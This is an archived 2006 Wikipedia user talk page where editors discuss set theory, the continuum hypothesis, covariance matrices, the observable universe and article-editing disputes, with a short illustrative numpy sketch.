Cantor's diagonal argument, can we construct an objection not in the sequence? -Dan 15:27, 24 May 2006 (UTC) Hmmm that depends. 
Can every objection be written as a finite list of symbols from a finite alphabet? Dmharvey 16:43, 24 May 2006 (UTC) Some are potentially infinite, I think you realize that. -Dan 18:40, 24 May 2006 (UTC) I apologize if I have annoyed you with my off-topic talk page ramblings. Incidentally if the posts immediately above this was also an issue, I assure you it was meant in fun. Cheers, -Dan 20:59, 26 May 2006 (UTC) No, no problem; I have no objection to general chattiness. I just think the discussion on that page is getting kind of long, and something should probably be done about it to reclaim the page for its intended purpose. But I wasn't annoyed, and no apology is necessary. --Trovatore 22:29, 26 May 2006 (UTC) ## Inaccessible cardinal axiom Not sure this is a standard name. Personally I wouldn't give it a name but would just call it "there exists a proper class of inaccessibles". The hierarchy of axioms is too finely divided to give every axiom a name (hard enough just keeping track of the large-cardinal properties). Anyway I've never heard this usage among set theorists. --Trovatore 03:33, 27 May 2006 (UTC) You know, I was just about to post a comment on User talk:JRSpriggs and ask him to comment on the actual usage of this axiom, but you'll do just as well. Anyway, I just read an informal paper which admitted that the axiom is not often used, and was arguing that it ought to be used. Actually, he's talking about the universe axiom' with that name, not the name inaccessible cardinal axiom. I can't comment on how much those names are used. Let me change the language a little and see how you like it. -lethe talk + 03:41, 27 May 2006 (UTC) I don't think it's so much "seldom used" as seldom called that. It's really a very weak axiom as these things go. I suppose it's adequate for category theorists who want only to talk about Grothendieck universes–provided all they want to prove in those universes, orthogonally to the Grothendieck–universe stuff itself, is what can be proved in ZFC. But what if you want more large–cardinal strength in the universes than that? The axiom of the form "there is a proper class of blank" that's currently of the most interest, I think, is the immensely stronger proposition "there is a proper class of Woodin cardinals". That's because that's about the minimum you need to make Ω-logic work sensibly. But of course that's off-topic in an article about inaccessibles, whereas the axiom you mention is not. And the axiom is true, of course. I'm just not sure it has enough separate importance to give it a highfalutin name; it's just a not-so-distinguished point in a very long and finely-divided hierarchy. --Trovatore 03:57, 27 May 2006 (UTC) Well, I understood that Grothendieck gave it a name, and I think that would be good enough, even if in modern set theory it's not very interesting. I'll admit that the paper wasn't crystal clear on that. Maybe Grothendieck only named the universe axiom and not the inaccessible cardinal axiom. In any case, do you have a suggestion? Excise the name altogether? But then what will we name the section header? -lethe talk + 04:15, 27 May 2006 (UTC) How about "A proper class of inaccessibles"? --Trovatore 04:30, 27 May 2006 (UTC) ## Re "New try at first para" Trov: can you say if my lastest suggestion for a new first paragraph at Talk: mathematics is acceptable to you? I'm trying to generate a consensus there. Thanks Paul August 18:49, 31 May 2006 (UTC) (P.S. 
nice new article on Suslin ;-) ## Large cardinal property Please check the new version of the first paragraph of Large cardinal property to make sure that it is correct. JRSpriggs 05:01, 8 June 2006 (UTC) Well, it's not worse than it was. On rereading it I'm a little concerned that it gives too much of an impression that this is an exact definition of large cardinal property (even though this is explicitly disclaimed later in the section). BTW I changed the all-caps to italics. --Trovatore 22:21, 8 June 2006 (UTC) Thanks for checking it. I felt that the old version was not as clear as it could be. I agree that the definition is not exact, but I do not see any better way of saying that than it already does. JRSpriggs 04:55, 10 June 2006 (UTC) ## Arithmetical and Borel hierarchies I edited Arithmetical hierarchy this morning. I saw in the talk that you were thinking of it in terms of classes of reals. I think that that meaning should go in the article Borel hierarchy which I am hoping to get to soon. —The preceding unsigned comment was added by CMummert (talkcontribs) 12:59, June 13, 2006. Hi Carl, I think the sets-of-reals meaning belongs in arithmetical hierarchy. It's the lightface counterpart to the Borel hierarchy, and it really is the same idea as for the sets of naturals. Just a little awkward to word. --Trovatore 13:28, 13 June 2006 (UTC) I agree that they are the same underlying idea. My hesitation is that the lightface Borel hierarchy (sets of reals) goes up to omega^{CK}_1 but the arithmetical hierarchy (sets of naturals) only goes to omega, so you can't count quantifiers in the lightface Borel hierarchy. My conception of the AH is closely tied to Post's theorem and counting quantifiers. I would appreciate your thoughts on how to arrange things, and I'll hold off the BH article for a while to think about it. (I apologize for forgetting to sign my previous comment.) CMummert 13:57, 13 June 2006 (UTC) I edited analytical hierarchy. What do you think of the general layout? Would a similar approach satisfy you for arithmetical hierarchy? CMummert 15:17, 13 June 2006 (UTC) ## "If" in definitions I did not see any contribution from you to the discussion about this topic which I initiated at Wikipedia_talk:WikiProject_Mathematics. However, since you are one of those who has changed "iff" to "if" in definitions, I would like to know what your justification is. I explained my position in the subsection I just added, Wikipedia_talk:WikiProject_Mathematics#Using a conditional rather than a biconditional in a definition is wrong. JRSpriggs 04:03, 20 June 2006 (UTC) Since I still find "if" offensive and you still find "if and only if" offensive, I am wondering whether we could agree on some third usage which is tolerable to both of us? For example, "means" or "is defined as". Would either of them be acceptable to you? JRSpriggs 05:25, 22 June 2006 (UTC) Heh, JRS and Trov trying to decide the fate of the world. :) As far as I am aware, 'if' is the standard, and I don't think anything can be done about it. :) Oleg Alexandrov (talk) 16:02, 22 June 2006 (UTC) ## Possible covariance matrices What are the restrictions on what matrices can be covariance matrices? I guess the matrix has to be symmetric; is any symmetric matrix a possible covariance matrix? --Trovatore 23:11, 19 June 2006 (UTC) I've now made the answer to this question into a new section in the article titled covariance matrix. 
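The answer, stated just below, characterizes the covariance matrices exactly as the nonnegative-definite symmetric real matrices. As a quick illustration of the constructive direction, here is a minimal numpy sketch; the particular matrix, random seed, and sample size are arbitrary choices for the example, not anything taken from the exchange.

```python
import numpy as np

rng = np.random.default_rng(0)

# Take any real symmetric nonnegative-definite matrix M.
M = np.array([[2.0, 1.0, 0.0],
              [1.0, 2.0, 1.0],
              [0.0, 1.0, 2.0]])

# Spectral theorem: M = Q diag(lam) Q^T with real lam >= 0, so M has a
# symmetric square root A with A @ A.T == M.
lam, Q = np.linalg.eigh(M)
assert np.all(lam >= -1e-12)
A = Q @ np.diag(np.sqrt(np.clip(lam, 0.0, None))) @ Q.T

# If Z has independent standard-normal components, X = A Z has Cov(X) = A A^T = M,
# so M really is a covariance matrix.  Check empirically:
Z = rng.standard_normal((3, 200_000))
X = A @ Z
print(np.round(np.cov(X), 2))   # approximately M, up to sampling error

# Conversely, every covariance matrix is nonnegative-definite, since
# v^T Cov(X) v = Var(v . X) >= 0 for every real vector v.
```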
The answer is that a matrix is a covariance matrix of a vector whose components are real-valued random variables if and only if it is a nonnegative-definite symmetric matrix with real entries. The proof involves a simple application of the finite-dimensional case of the spectral theorem. Michael Hardy 17:14, 22 June 2006 (UTC) I notice that your question, "is any symmetric matrix a possible covariance matrix?", is the easy part. That some such matrices are NOT covariance matrices follows quickly from one of the identities. But a point of rhetoric: Your question, "is any symmetric matrix a possible covariance matrix?" is ambiguous. It could mean "is there any symmetric matrix that is a possible covariance matrix?" or it could mean "is every symmetric matrix a possible covariance matrix?". Michael Hardy 17:17, 22 June 2006 (UTC) ## Thermodynamic temperature and absolute zero Discussion moved to talk:thermodynamic temperature; please continue there. --Trovatore 15:45, 12 July 2006 (UTC) ## vandalism Hi, I assume that you are not 87.29.89.217 (talk · contribs), so I took the liberty of reverting his/her edit to your page. If you have indeed become a native de/it speaker overnight, please accept my apologies. --Aleph4 09:55, 3 August 2006 (UTC) ## Photon in the box Il Trovatore, please stop restoring this section. This section is a disaster, it talks about entities long abandoned in SR (rest/relativistic mass), it has no experimental foundation, it has no references, it is contradicted by other articles in the same page, it looks like someone's pet college exercise and does not conform to wiki's definition. Please remove it and stop reverting it, it is an embarrassment. Ati3414 00:32, 8 August 2006 (UTC) ## Relativistic mass, rest mass If you want to hang on to these outdated concepts, fine. If you want to use them as a means of propping up an even more ridiculous concept, the "photon in a box" exercise picked off the John Baez FAQ, this is fine too. If you want to apply the concepts to calculating the "mass" of a system of photons, fine with me as well. This is what makes wiki a joke when it comes to the relativity chapter. Ati3414 00:32, 8 August 2006 (UTC) ## Constants Hey, Sorry if you didn't like the definition I was used to, it's just the only one to which I was exposed. I am wondering what you mean when you say it's "useful" to keep it your way; they seem, to me, equivalent, and I just saw my version as being simpler. I probably haven't seen or worked as much with logic as you have, so I was wondering if you could enlighten me. Also could you recommend a book or two? thanks, --Bernard the Varanid 01:08, 8 August 2006 (UTC) oh, also I should probably revert the similar change I made to List of first-order theories. I'll go do that now...--Bernard the Varanid 01:10, 8 August 2006 (UTC) Actually, on reflection I'm not so sure. I thought I remembered that constant symbols didn't make the Ehrenfeucht–Fraïssé game any more complicated, but function symbols did. But I'd have to think it through again and see if I was really right about that. --Trovatore 01:13, 8 August 2006 (UTC) I fail to see the utility of removing wikilinks. --Michael C. Price talk 20:03, 9 August 2006 (UTC) It's policy that you shouldn't link to the same article twice. In practice I think it's fine to repeat a link if the first link was much earlier in the article, to save people from scrolling up (see WP:SENSE and WP:IAR), but repeated identical links in the same short section are distracting and ugly. 
--Trovatore 20:08, 9 August 2006 (UTC) ## Stop reverting If you don't understand what you are dealing with then leave it alone, you are reverting back in antiscientific,antiquated POVs. Stick to your math, leave physics alone Ati3414 04:08, 10 August 2006 (UTC) ## Create arguments page at Photon Would you please create an arguments subpage at Talk:Photon and perhaps also Talk:Mass in special relativity as you did at Talk:Gödel's incompleteness theorems, and move all the back and forth with Ati3414 there. JRSpriggs 10:44, 13 August 2006 (UTC) Hmm, that thought had occurred to me, but the problem is that the material is not so cleanly separated. All the stuff about exercises and thought experiments should go into "Arguments", but it's interleaved with opinions about what should appear on the article page, which (tiresome as some of those opinions are) actually do belong on the talk page. In the Gödel case it was easier; there were whole sections that had dropped any pretense of being editorial. But if you feel like wading through it, go for it. There's nothing technically hard about it. --Trovatore 18:03, 13 August 2006 (UTC) How about a normal archiving then? The point is that the talk pages are much too long now. JRSpriggs 05:10, 14 August 2006 (UTC) ## Nice "sonnet" On my page, all things are sonnets No matter their number or phonics, I love them all, from half rhymes to triplets, } And anacoluthon will fit it. } So thanks I will extend to each of the wits } And laurels I profer with the right extended And, for the left, pray don't inspect it. (Nice use of the polysyllable, there....reminded me of TSE's "polyphiloprogenitive, the sapient sutlers of the Lord." Geogre 02:27, 17 August 2006 (UTC) The form, as you may know, is a double dactyl, and the hexasyllabic word is one of the requirements. Notwithstanding my favorite example, by Piet Hein, breaks that rule. I won't break his copyright, but I don't mind telling you who will: Go to this site and search for the word "grook". I once won a (notional, but Totally Official) sheep with one of these. Search for "Michael Ray Oliver" and "xerolocality". (Yes, I figured out later it should have been "xerilocality", but the officials didn't notice at the time.) --Trovatore 04:08, 17 August 2006 (UTC) ## Stop move of "Ordinal number" User:Salix alba is planning to move Ordinal number to another name. Please stop him. JRSpriggs 03:49, 4 September 2006 (UTC) ## Infinity and User:202.91.77.170 I am all over this one! HighInBC 03:48, 13 September 2006 (UTC) ## 12 / 0 = 0, says school division chart If evidence is found that there actually are schools which have sunk so low as to use this chart, it just might be worth a mention. -- Meni Rosenfeld (talk) 18:46, 2 August 2006 (UTC) It's actually highly educational. It's a good early lesson that grownups don't always know what they're talking about, and just because you see something on a laminated chart doesn't make it true. --Trovatore 18:50, 2 August 2006 (UTC) I looked at that web page, and I can't see anything on the chart that says 12/0 = 0. It's too small to read. How do you know it's there? Michael Hardy 20:29, 4 August 2006 (UTC) Save the image to disk, and blow it up in ImageMagick or Eye-of-gnome or whatever you use. --Trovatore 20:50, 4 August 2006 (UTC) Can you shed any light on how to do that? I looked at the html code for that page. I find various gif and jpg files, but none that appears to be that particular image. 
Michael Hardy 21:38, 19 September 2006 (UTC) Well, it's browser-dependent, but in Mozilla I just right-click it, and choose "Save image as..." --Trovatore 21:41, 19 September 2006 (UTC) Oh... right-clicking. I'm not used to that. Thanks. Michael Hardy 21:52, 19 September 2006 (UTC) Trovatore, your comments on my talk page (we should henceforth use the talk page on the Observable Universe article) concluded with "...There is likely a planet somewhere whose observable universe does not even include the Earth, so it obviously can't be the same as Earth's observable universe." This statement is true of billions of planets because electromagnetic radiation follows the inverse-square law. There exist objects in the observable universe sufficiently far from each other that the inverse-square law kills any radiation one observer might detect from the other observer. By your definition then, there are billions of planets that would be "outside of the observable universe." But the observable universe is not defined by observers that live on Earth but rather upon the maximum possible physical size the universe could be, based upon inflation models. Thus, the observable universe does indeed include billions of star systems that technically can't "see" each other but which still exist within the same observable universe. If, as the article contends, scientists mean "observable universe" when they say "universe" then we cannot define the observable universe as that space excluding observers that cannot see each other's radiation. Within the current experimentally-supported (i.e. WMAP, et. al.) cosmological models the observable universe is the universe and anything existing outside of our own space-time is irrelevant (physically, that is). For these reasons primarily I originally deleted the "ball-shaped region surrounding the Earth" comment in the intro back in June. Until we find a source that supports this claim of a preferential reference frame it would not make sense to go back to that definition. The current intro. para. on the O.U. page now reflects, with proper verifiable citations, the scientific definition of an observable universe without reference to a particular observer. I am happy to discuss your take on these ideas from your mathematical background. Perhaps we can find a way to improve the article further together. Cheers, Astrobayes 19:32, 25 September 2006 (UTC) There is no upper limit to "the physical size of the observable universe, based upon inflation models". It may well be infinite. Take a look at the responses to my questions at Wikipedia talk:WikiProject Physics, particularly those of Chris Hillman and JRSpriggs. As for the inverse square law, that has nothing to do with it. I'm not talking about whether the intensity of light would be too low to be observed, but whether the light could get there at all, given that it can't follow a spacelike path --Trovatore 19:56, 25 September 2006 (UTC) There is in fact an upper limit on the size of the universe and the sources I cited, which you deleted, again, explain this in very understandable terms. Three times now you have reverted a section that I put in, deleted its citations, and kept the same wording each edit - without citations to support what you've written. I have done a search to verify the edit you've made and I can not verify what you've edited with any source. According to the Wikipedia policy on verifiable sources, what you've written is therefore in dispute. 
Even if you can make a compelling personal case for why what you've put in the article might make sense, Wikipedia forbids original research, so there is therefore a burden on the editor (you) to cite references for what you've edited. I am therefore asking you, again, to kindly cite these sources because I'm exhausted at this debate and I'm ready to submit this article for arbitration. Again, the introductory paragraph in this article is not supported by any resource that I can find, be it scholarly article, periodical, or peer-reviewed journal. As it stands now it is physically confusing. In addition to this I would remind you that there is a three-revert rule in general here. So, neither you nor I can make another revert on this article until this matter is settled. Post your sources from where you obtained the phrase "ball-shaped region surrounding the observer." After an extensive search I find none that support such a definition of observable universe. You are stretching the limits of good faith here and I think it is time we get some arbitration on this article. Astrobayes 22:04, 25 September 2006 (UTC) As to the first source: I'd need a ScienceDirect password to get it; it's possible that I can do this through one of my university logins but I'm not going to try right now (I'm at work). Please quote the exact text that you think supports your case. As to the second: It flatly contradicts you. Note the second paragraph of the introduction: ...it is certainly possible that the Universe extends infinitely in each spatial direction... So there is, in fact, no upper limit imposed on the size of the (whole) universe by anything in current knowledge. --Trovatore 22:19, 25 September 2006 (UTC) FWIW I'm with Trovatore on this. There is no limitation on the possible size of the universe, which may be either finite or infinite. Astrobayes is making a number of other strange claims, such as the observable universe forming a ball shaped region implying a special reference frame: it doesn't imply anything of the sort: it is consequence of the shape of the future and past light cones. --Michael C. Price talk 01:18, 26 September 2006 (UTC) This is the problem... this "discussion" has become so entrenched in semantics and mathematics that my original edit I made to that article, the sources I cited, and the explanation I gave back in June (which have several times been deleted) are nothing like the statement in the preceeding paragraph. First and foremost, I am a physicist by education and training. And I am not attempting to make any strange claims. My problem with the original article was the statement, "...a ball-shaped region surrounding the Earth..." and my point was quite simply that we can define an observable universe without any mention of Earth, and there are strong arguments against an infinite universe in light of current observations. Period. And these are not my words; one great resource of many is to consult Misner, Thorne, and Wheeler's text on Gravitation, Chapter 27, pp.701+. The "Earth" bit has been removed from the article and I can live with that now. But my problem was always with putting the Earth as somehow important to define the reference frame for the observable universe, when doing so is not necessary; my problem was never with the spherical nature of the observable universe; in fact, relativity says it must be so. 
Since Wikipedia is an encyclopedia, for non-specialists, I was trying to stay away from technical arguments and all of the convoluted mathematics that subsequent discussions on this topic centered upon. Read the chapter I just cited in the M.T.W. text. You'll see that there are convincing physics arguments for having a universe with a finite radius. I appreciate that Trovatore and others are very skilled mathematicians. But a Ph.D. in set theory does not a physicist make. And I was simply trying to put aside all of my fancy education (we would all do well to do this when editing these articles) and instead read the article from a perspective of a curious youngster who had read a little on astronomy and physics in their local library. When I saw the "...region surrounding the Earth..." bit, my physics alarm went off. "This sounds like the celestial sphere," I said. Who cares where Earth is in all of this? If I were a youngster reading this in their local library I would be inclined to ask, "Is not the observable universe the observable universe regardless whether we're in Andromeda, on Earth, or near Alpha Centauri?" So, I dug up some resources to help me answer that question, cited them, and they were promptly deleted (a good WP editor would have, instead of deleting them, moved them to the external links references, but that's another issue). I am also a scientist and I do concede that as we relax our assumptions on any model, our results can change. Perhaps the universe is indeed infinite (doing so presents some problems with energy, but see the M.T.W. text reference above). But since the article is on the observable universe, anything that can not be observed (read: any universe we make up in our heads that may or may not exist outside of the observable universe) is as irrelevant as choosing a particular point of observation and saying that the view from there is somehow special. Again, my problem was always with the "Earth at the center" bit, not the sphericity of the observable universe. With the "Earth" bit taken out of the article, I'm happy and I'll let the rest of it go. I would also like to say that both Trovatore and I have reached our revert limit on the article. Any further edits on that particular section by anyone else can not be reverted by either Trovatore or me, Astrobayes, as doing so would really be in poor trust of WP policy. Cheers, Astrobayes 17:59, 26 September 2006 (UTC) You posed the question: "Is not the observable universe the observable universe regardless whether we're in Andromeda, on Earth, or near Alpha Centauri?". The answer is no. PS I am a physicist not a mathematician. Reading MTW pg 750 I note the sentence "But today's view of cosmology, as dominated by Einstein's boundary condition of closure (k = +1) and his belief in $\Lambda = 0$, need not be accepted on faith forever"..."Observational cosmology will ultimately confirm or destroy them". Observation has already rejected one of these two articles of faith. Now take the argument back to the appropriate talk page. --Michael C. Price talk 18:25, 26 September 2006 (UTC) "Oh bother" (well, something stronger). I was completely unaware of this - thanks for drawing this to my attention. I've started a discussion on it over at Wikipedia:WikiProject Mathematics. Tompw 15:13, 9 October 2006 (UTC) ## Re: Markup in section headers Sorry about that... I didn't realize it broke clickability. 
-- Moondigger 00:32, 17 October 2006 (UTC) ## "a monarchy is never a republic" er, that would be decidedly wrong. the presence of an executive heading one branch of a government occurs under a constitutional monarchy, such as what England, then Great Britain, had following the Revolution of 1688-89. reverted. Stevewk 15:28, 19 October 2006 (UTC) • hey, you're being ignorant. i buried my stuff in a footnote. ok, i'll have the Wiki guys step in. Stevewk 21:25, 19 October 2006 (UTC) ## Image copyright problem with Image:NiceBobKitty.jpg Thanks for uploading Image:NiceBobKitty.jpg. The image has been identified as not specifying the copyright status of the image, which is required by Wikipedia's policy on images. If you don't indicate the copyright status of the image on the image's description page, using an appropriate copyright tag, it may be deleted some time in the next seven days. If you have uploaded other images, please verify that you have provided copyright information for them as well. This is an automated notice by OrphanBot. For assistance on the image use policy, see Wikipedia:Media copyright questions. 07:09, 20 October 2006 (UTC) ## don't replace HTML by unicode please, could you stop making edits just to replace HTML to unicode, like in this edit? on several pages it is explicitly mentioned that this should not be done. — MFH:Talk 23:29, 20 October 2006 (UTC) Markup should never be used in section headers (though simple wikilinks, that is with no colon at the start, are OK). This is because the edit summaries reflect the markup, and when you click on them, you don't get sent to the correct anchor. So I will continue to remove markup from section headers. --Trovatore 23:38, 20 October 2006 (UTC) ## Cardinalities and models Cardinality is an inherent and absolute property of each set (if the set exists). If two models disagree on the cardinality of the same set, then at least one of the models is deficient (e.g. countable model of real numbers according to the Skolem-Löwenheim theorem, which does not satisfy the Least-upper-bound axiom). Leocat 18:36, 21 October 2006 (UTC) Which is relevant how to what I said? This is what I wrote: so what you wrote at continuum hypothesis is kind of a natural mistake, but still wrong. I'm guessing you're thinking of CH as saying "there is no set of reals of cardinality strictly between that of the naturals and that of the reals", and so you'd think if you have more sets of reals, then you have more chance to find such a set. What you're missing is that the smaller model and the larger one may not agree on whether a given set of reals has the same cardinality as R. Given a fixed set of reals X that's in both models, it's the larger model that might have a bijection between X and R, when the smaller one doesn't. It actually works in exactly the opposite direction from what you might have thought. If N and M are two transitive models of ZFC both containing all the reals, with N contained in M, then if N satisfies CH, then M must also satisfy CH. But the reverse is not true. --Trovatore 06:48, 20 October 2006 (UTC) Now, in the above case, obviously N is "deficient" (if it disagrees with M about CH). N fails to have a witness that the cardinality of the reals is $\aleph_1$; that witness shows up in M. And in that case, CH is really true. But that doesn't falsify anything I said. --Trovatore 18:50, 21 October 2006 (UTC) But what if CH is false? Then the richer model may have a witness to $\aleph_1$ < continuum. 
(By the way, Freiling's axiom of symmetry looks pretty convincing to me. What do you think about it?) Leocat 19:20, 21 October 2006 (UTC) What do you mean by a witness that CH is false? I can imagine a witness that CH is true -- a well-ordering of the real numbers together with injections from each of its proper initial segments into the natural numbers. But what would your witness be? JRSpriggs 09:59, 22 October 2006 (UTC) A construction (or at least a proof of existence) of a set whose cardinality is strictly between $\aleph_0$ and the continuum would be such a witness. This has been the problem in the research on CH so far, not establishing the cardinality of a set. Therefore it is natural to consider models containing certain subsets of R and enough functions to establish their cardinality. Leocat 17:03, 23 October 2006 (UTC) Leocat, you still don't seem to have come to terms with the fact that "having cardinality between $\aleph_0$ and the continuum" is not a property that's preserved upwards from a smaller model to a bigger one. The reason is that the larger model may have a bijection between the set in question and the continuum, that the smaller model lacks. Whereas the property "being a bijection between $\aleph_1$ and the continuum" is preserved upwards, between models that have the same reals. (It's not obvious, but is true, that if they have the same reals, then they also have the same $\aleph_1$). --Trovatore 17:27, 23 October 2006 (UTC) You should realize that your model may fail to establish "having cardinality between $\aleph_0$ and the continuum", but having such cardinality is an absolute property of a set - either it has it, or it does not. So you need a model that is rich enough to let you establish either existence of a set with such a cardinality, or a contradiction caused by the assumption that such a set exists. You keep mentioning models that do not let you establish certain bijections, while this has not been the problem in the history of research on CH. You have not answered my question about Freiling's axiom of symmetry. Leocat 14:27, 24 October 2006 (UTC) 1. "Either the set has it, or it does not", in the sense that every mathematical proposition is either true or false, yes. But that doesn't help in this context. It's not an "absolute property" in the usual technical meaning of "absolute", which is that different models (restricted to a context-dependent collection of such models) agree on the property. 2. Models do not "establish" anything, in the usual sense of the word "establish". Propositions are true or false in models; they are established (that is, proven), or refuted, in theories. Your use of language is a bit sloppy here. You need to distinguish carefully between syntax (theories) and semantics (models). 3. Research on CH has moved on a bit from what you may know about it. Yes, the early work was about trying out various kinds of definable sets -- open sets, perfect sets, Borel sets -- and seeing if they could be of intermediate cardinality. Basically the answer to all those questions is "no" -- all sets "like that", in a sense I won't get into now, are either countable or have the cardinality of the continuum. That doesn't really help much in trying to figure out whether a radically undefinable set might have intermediate cardinality. 4. Freiling's argument is interesting, but not convincing to me personally. 
Things like probabilities and measures don't work well with arbitrary, non-definable sets; Banach-Tarski is a good example of this. In fact Freiling admits that it's an argument not just against CH, but also against AC; since AC is obviously true in the full universe of sets, there must be something wrong with the argument in that context. --Trovatore 16:03, 24 October 2006 (UTC) Would you enlighten me why Freiling's argument is an argument against AC? Leocat 18:18, 24 October 2006 (UTC) I don't actually remember that (assuming I actually knew it at one point). But you can look up Freiling's article in the JSL, or one of the famous Penelope Maddy papers, "Believing the Axioms, I" and "Believing the Axioms, II". --Trovatore 05:32, 25 October 2006 (UTC) ## measurable functions not closed under composition Hi Trovatore, nice to meet you. Thanks for your thoughtful answer to my HelpDesk question on measureomorphisms last month. (Unfortunately it's out of reach now, the page has only more recent questions) I just put a comment on talk page of Measurable function, and hope it's ok I referenced what you said. Now I'm honestly wondering if they are actually closed under comp., but I've experienced many times apparently obvious reasoning blown away by something tricky when set or measure theory is involved. Regards, Rich 10:12, 4 November 2006 (UTC) ## Kolmogorov complexity Could you please have a look at that article. I am particularly concerned about the recently inserted picture of the Mandelbrot set. See my remark on the talk page. Although models of computation over the reals have been developed (e.g. by Smale, Shub, Blum and others), Kolmogorov complexity as dealt with in this article concerns objects which are explicitly encoded by finite bitstrings (Remark: what an encoding is for elements of a class of objects, is itself not entirely trivial. I think of an encoding as analogous to a chart on a manifold; here two charts φ, ψ are equivalent iff the overlap function φψ⁻¹ belongs to some computational class such as PT.) In any case, I don't see how one can consider a class of subsets of the plane large enough to include the Mandelbrot set as being encoded by finite bitstrings. I am aware that some very special classes of iteratively defined fractals can be encoded by finite bitstrings, but it's not clear to me how that applies here. In any case, I am very tired of the endless argumentation on WP.--CSTAR 18:33, 4 November 2006 (UTC) ## Probability-based strategy AfD Just a note to let you know that I have nominated the article you have edited, or expressed interest in, for deletion. See Wikipedia:Articles for deletion/Probability-based strategy Pete.Hurd 05:29, 7 November 2006 (UTC) ## 12/0 = 0, bis Since you participated in the discussion at talk:division by zero about the chart being sold by an (allegedly) educational publisher that says that 1/0 = 0, 2/0 = 0, etc., perhaps it will interest you to know that at this web site where the chart is sold, the publisher now solicits opinions of the product. You can go there and tell them what you think. Michael Hardy 20:58, 9 November 2006 (UTC) Thanks, Michael --Trovatore 21:01, 9 November 2006 (UTC) ## About Category:Redirects from alternate names Hi, Mike. Concerning the message you left me I will not recreate this category. By the way, you hold a PhD in mathematics, mathematics is one of my favourite subjects. I was very glad to know that Wikipedia has about 15 000 articles about mathematics which is more than the articles in MathWorld. 
--Meno25 17:35, 10 November 2006 (UTC) Thanks, Meno. Are you getting your degree in math? --Trovatore 04:59, 11 November 2006 (UTC) • Sure I will try, but in Egypt where I live, I am still young for this. --Meno25 02:29, 14 November 2006 (UTC) ## Winning strategy Do you have a citation from a game theory text that this is within the scope of game theory rather than combinatorial game theory? I checked the usual suspects (Osborne & Rubinstein, Gibbons, Tirole & Fudenberg) and can't find it. ~ trialsanderrors 19:46, 14 November 2006 (UTC) I have no idea. It's a bit of a problematic article. It already existed when I started working on determinacy, and it was interfering with the more technical definition (though of the same idea) that I wanted to make there. But it's definitely not combinatorial game theory. Maybe it's not ordinary game theory either. I think it's more "theory of real-world two-player perfect-information games". --Trovatore 20:15, 14 November 2006 (UTC) Ok, I brought it up at User talk:Trialsanderrors/SCIENCE#Test case: Winning strategy. ~ trialsanderrors 20:33, 14 November 2006 (UTC) The article appears to me to be correct. It is just stated in a more general and less mathematical way than in Determinacy. Also, I do not think that it is limited to two-person games nor to perfect-information games. JRSpriggs 09:53, 15 November 2006 (UTC) Yeah, there's nothing really wrong with the article; it just doesn't fit neatly into the larger scheme of things. In what context is it trying to explain winning strategies? Barnaby Dawson wrote it, I think, to support axiom of determinacy, but it isn't well-suited for that purpose in my opinion. The first time a person sees this notion, if it's described in terms of real-world board games like chess, he's likely to be thinking too much of algorithmic strategies. Charles Matthews did some rewriting of the article under the assumption that it was about real-world games (he's a rather well-known go player, I think) and it didn't really fit with the way strategies are usually described in determinacy theory. So I put a definition inline in determinacy, possibly too terse, but more narrowly tailored to the subject, and put the pseudo-dabline at the top of winning strategy. I don't know what the best global solution is. --Trovatore 17:20, 15 November 2006 (UTC) Why not just make winning strategy into a disambiguation page? This solution appears to have worked for random number, another article that was vaguely related to many topics but not really about any one of them. CMummert 17:31, 15 November 2006 (UTC) ## Re: Hydrogen carbonate As I mentioned in my reference desk post, which I assume you already saw, I would like to see sources for this usage you propose. Though I can easily find references to hydrogen chloride, hydrogen sulfate, hydrogen phosphate, and so on referring to the compounds, I cannot find any reference to hydrogen carbonate referring to H2CO3, nor does it match what I was taught (I was a chemistry major back in college). I did not mean to imply that I thought the term was logical or preferable. — Knowledge Seeker 06:36, 17 November 2006 (UTC) ## Romano Prodi Just to let you note that an IP address has put back the infamous KGB allegations sections. Curiously, it is one of the same IP addresses as before. --Angelo 17:54, 17 November 2006 (UTC) Just a quick not imploring you not to revert again, I don't want to see you being blocked for a 3RR. 
Kind Regards - Heligoland | Talk | Contribs 16:58, 22 November 2006 (UTC) Thanks for the note. Actually I could revert another time without violating the letter of the law, but I won't today. Others can take it up. To tell the truth I'd be less inclined to fight the addition of the material if it had been added by someone with an established username under which he continued to edit. For most purposes we can say anon editors are equal to those who give their names, but when it comes to controversial edits, I don't think we should be forced to give equal weight to ghosts. --Trovatore 17:07, 22 November 2006 (UTC) According to Wikipedia:Biographies of living persons, the WP:3RR does not apply to removing unverified derogatory claims about a living person. "In cases where the information is derogatory and poorly sourced or unsourced, this kind of edit is an exception to the three-revert rule." JRSpriggs 07:02, 23 November 2006 (UTC) ## Ultrafilter explained through hyperreal numbers as a motivating example I am sorry if I have spoiled the Ultrafilter article. I thought my contribution to serve as a good motivating example. Shall I begin to amend it, or shall I revert it entirely (e.g. because of being out-of-place etc.)? Thank You for Your attention. Physis 16:39, 19 November 2006 (UTC) Hm? Why do you think you've spoiled it? In one edit summary I said I hadn't read it yet, which I still haven't. I probably shouldn't even have mentioned that. --Trovatore 18:35, 19 November 2006 (UTC) Thank You for the quick answer! Best wishes, Physis 19:22, 19 November 2006 (UTC) ## von Neumann Care to explain why the lowercase tag is innapropriate to articles that begin with "von Neumann"? None of the articles use "Von Neumann" in the body of the text. - Stormwatch 15:30, 24 November 2006 (UTC) The WP capitalization convention is to start article titles with a capital letter. In a few cases this does violence to the meaning of the phrase. A good example is e (mathematical constant). It is rendered "E" in the article title, but the constant is never called "E", and if that were used in print, people simply would not understand what you mean. There is no such problem with "von Neumann". Von Neumann's name does sometimes use a capital "V", namely when it starts a sentence (as, for example, in this sentence). So it's not true to say that the title is incorrect; since the V is the first letter of the title, by WP capitalization conventions, the capital V is correct. --Trovatore 19:01, 24 November 2006 (UTC) So you couldn't move omega-consistent theory because you didn't want to go through a simple formality, and instead I had to go through the trouble ;) I hope you feel a bit guilty now, and that you'll willing to give #Reconsider adminship? another thought. I assume you finished your moving house, so: would you accept a nomination to become administrator? Per favore? -- Jitse Niesen (talk) 08:46, 25 November 2006 (UTC) ## Wikipedia:Articles for deletion/Alexander Litvinenko assassination May I suggest that you speedily close Wikipedia:Articles for deletion/Alexander Litvinenko assassination. This article has thousands of edits in its edit history, so deleting is not an option. You are of course free to revert the move and split, if you feel so (or suggest it). -- Petri Krohn 02:05, 4 December 2006 (UTC) The article in now on Main page, so this is urgent. --Petri Krohn 02:16, 4 December 2006 (UTC) I misapprehended what had happened, for which I apologize. 
